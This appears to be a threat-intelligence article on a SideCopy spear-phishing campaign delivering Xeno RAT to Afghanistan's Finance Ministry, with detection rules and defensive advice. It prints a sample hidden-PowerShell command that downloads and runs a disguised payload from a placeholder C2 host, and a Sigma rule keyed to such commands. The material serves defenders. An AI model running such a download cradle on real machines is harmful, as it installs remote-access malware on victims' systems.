Pakistan-Linked SideCopy APT Targets Afghanistan Finance Ministry with Xeno RAT

Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT

Cybersecurity researchers have disclosed a spear-phishing campaign attributed with high confidence to the SideCopy threat group — a Pakistan-aligned advanced persistent threat (APT) actor — targeting Afghanistan's Ministry of Finance. The campaign delivers the Xeno RAT, an open-source remote access trojan, via a ZIP archive distributed through targeted phishing emails.

The research was published on June 2, 2026, by The Hacker News, and represents the latest documented intrusion by SideCopy against South and Central Asian government targets.

Attribution: Who Is SideCopy?

SideCopy is a Pakistan-linked threat group first identified in 2019. It is believed to operate in support of Pakistani state intelligence objectives, with a consistent focus on targets in:

• India — Indian defense, government, and military organizations
• Afghanistan — Government ministries, financial institutions
• Central Asia — Regional governmental entities

The group is named for its tactic of mimicking SideWinder, another South Asian APT, by copying its infection chains. SideCopy has demonstrated increasing operational sophistication over the years, incorporating commercial and open-source tools alongside custom malware.

Campaign Overview

Initial Delivery: Spear Phishing with ZIP Archive

The campaign begins with a spear-phishing email crafted to appear legitimate and relevant to Ministry of Finance personnel. The email contains a malicious ZIP archive as an attachment.

Attack Chain:
Spear-phishing email (Ministry of Finance theme)
  → ZIP attachment opened by target
    → Contents extracted: LNK shortcut or weaponized document
      → Loader executes, downloads Xeno RAT
        → Xeno RAT establishes C2 connection
          → Persistent access to Ministry systems

Payload: Xeno RAT

Xeno RAT is an open-source remote access trojan available on GitHub. While its open availability might suggest less-sophisticated actors, state-aligned groups frequently adopt open-source tools because:

1. Attribution obfuscation — Open-source tooling is used by many actors, complicating attribution
2. Rapid deployment — Mature, well-documented codebase reduces development time
3. Feature completeness — Xeno RAT provides a comprehensive C2 capability set

Xeno RAT Capabilities:

Technical Analysis

ZIP-Based Delivery

ZIP archives remain a popular phishing delivery mechanism because:

• Many email security gateways scan top-level attachments but may not perform deep inspection of nested archive contents
• Recipients are conditioned to expect ZIP files for document delivery
• Password-protected archives can bypass automated scanning entirely (though this campaign's archive protection status was not specified)

LNK Shortcut Technique

SideCopy has historically used Windows LNK (shortcut) files within archives as a delivery mechanism. When executed, the LNK file runs a hidden PowerShell or CMD command that:

1. Displays a decoy document (e.g., an official-looking finance ministry PDF)
2. Silently downloads and executes the Xeno RAT payload in the background

# Example LNK execution pattern (conceptual)
powershell.exe -WindowStyle Hidden -Command "
  Invoke-WebRequest -Uri 'http://c2.domain/xeno.exe' -OutFile $env:TEMP\svchost32.exe;
  Start-Process $env:TEMP\svchost32.exe"

C2 Infrastructure

SideCopy typically registers domains that mimic legitimate services or government entities of the target country. Infrastructure analysis often reveals:

• Short-lived domains registered through privacy-protecting registrars
• Hosting on VPS providers in countries with limited law enforcement cooperation
• TLS certificates to blend with legitimate HTTPS traffic

Geopolitical Context

The targeting of Afghanistan's Ministry of Finance is consistent with Pakistani intelligence priorities following the 2021 Taliban takeover. Key intelligence interests include:

• Financial flows and foreign aid distribution
• Government decision-making affecting regional economic policy
• Diplomatic communications between Kabul and international partners
• Internal political dynamics and factional power structures

SideCopy's persistence against Afghan targets — continuing well after the Taliban government took power — suggests the group's tasking has adapted to collect intelligence on the new administration rather than ceasing operations.

Indicators of Compromise (IoCs)

Security teams should hunt for the following indicators (specific hashes and domains are subject to change as the actor rotates infrastructure):

Detection Rules (Conceptual YARA/Sigma)

# Sigma rule — Xeno RAT process behavior
title: Xeno RAT Suspicious Process Spawning
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
    CommandLine|contains:
      - '-WindowStyle Hidden'
      - 'Invoke-WebRequest'
      - 'Start-Process'
  condition: selection

Behavioral Indicators

Recommended Defenses

Email Security

1. Block password-protected archives from external senders or require manual review
2. Enable sandboxed attachment detonation (e.g., Defender for Office 365 ATP, Proofpoint TAP) to dynamically analyze ZIP contents
3. Implement SPF, DKIM, DMARC to reduce spoofed sender addresses mimicking government domains

Endpoint Protection

1. Block LNK execution from user-writable directories (Downloads, Desktop, Temp):

   Attack Surface Reduction Rule:
   Block all Office applications from creating child processes
   Block JavaScript or VBScript from launching downloaded executable content
   

   Copy

2. Enable PowerShell ScriptBlock logging to detect obfuscated download cradles:

   # Enable ScriptBlock logging (Group Policy or registry)
   Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" `
     -Name "EnableScriptBlockLogging" -Value 1

   Copy

3. Restrict PowerShell execution policy to AllSigned or RemoteSigned for non-administrators

Network Monitoring

• Alert on new outbound connections to recently registered domains (< 30 days old)
• Monitor for unusual data volumes from workstations connecting to non-corporate cloud infrastructure
• Use DNS-layer security (Cisco Umbrella, Cloudflare Gateway) to block newly observed malicious domains

Key Takeaways

1. SideCopy (Pakistan-aligned APT) is conducting a targeted spear-phishing campaign against Afghanistan's Ministry of Finance
2. The campaign delivers Xeno RAT — a full-featured open-source RAT — via malicious ZIP archives, enabling persistent remote access and intelligence collection
3. Government and financial organizations in South and Central Asia should heighten phishing defenses and monitor for Xeno RAT behavioral indicators
4. The choice of open-source tooling complicates attribution — defensive teams should rely on behavioral TTPs rather than malware signatures alone
5. This campaign reflects ongoing Pakistani intelligence interest in monitoring Afghan government operations

Sources

• The Hacker News — Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT
• MITRE ATT&CK — SideCopy Group Profile
• Xeno RAT GitHub Repository